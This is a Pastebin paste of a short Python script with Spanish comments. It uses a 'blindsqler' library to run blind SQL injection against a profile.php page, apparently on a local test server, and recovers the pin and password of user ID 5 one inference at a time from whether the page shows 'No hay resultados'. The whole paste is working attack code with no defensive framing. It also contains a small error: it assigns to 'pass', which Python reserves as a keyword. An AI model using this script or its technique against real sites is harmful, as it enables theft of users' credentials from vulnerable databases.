Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- #-*- coding: utf-8 -*-
- import blindsqler
- from urllib import urlopen, urlencode
- class Localhost(blindsqler.QueryHandler):
- """ El manejador de querys de un server de prueba """
- def __init__(self, uid, field):
- self.uid = uid # El ID del usuario
- self.field = field # El campo cuyo valor se quiere adivinar
- def query(self, data):
- url = "http://localhost/profile.php"
- q = "%s AND %s %s" % (self.uid, self.field, data)
- url = url + '?' + urlencode(dict(id=q))
- pag = urlopen(url).read()
- if "No hay resultados" in pag:
- return False
- else:
- return True
- localhost_pin = Localhost(5,'pin') # El campo pin del usuario con UID 5
- pin = blindsqler.adivinaint(localhost_pin, [0,65535]) # Suponiendo que el valor máximo del pin sea 65535
- localhost_pass = Localhost(5,'password') # El campo password del usuario con UID 5
- pass = blindsqler.adivinastr(localhost_pass, length=30, mssql=False) # La máxima longitud sería 30, y le decimos que no usamos Microft SQL Server. Estos argumentos son opcionales
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement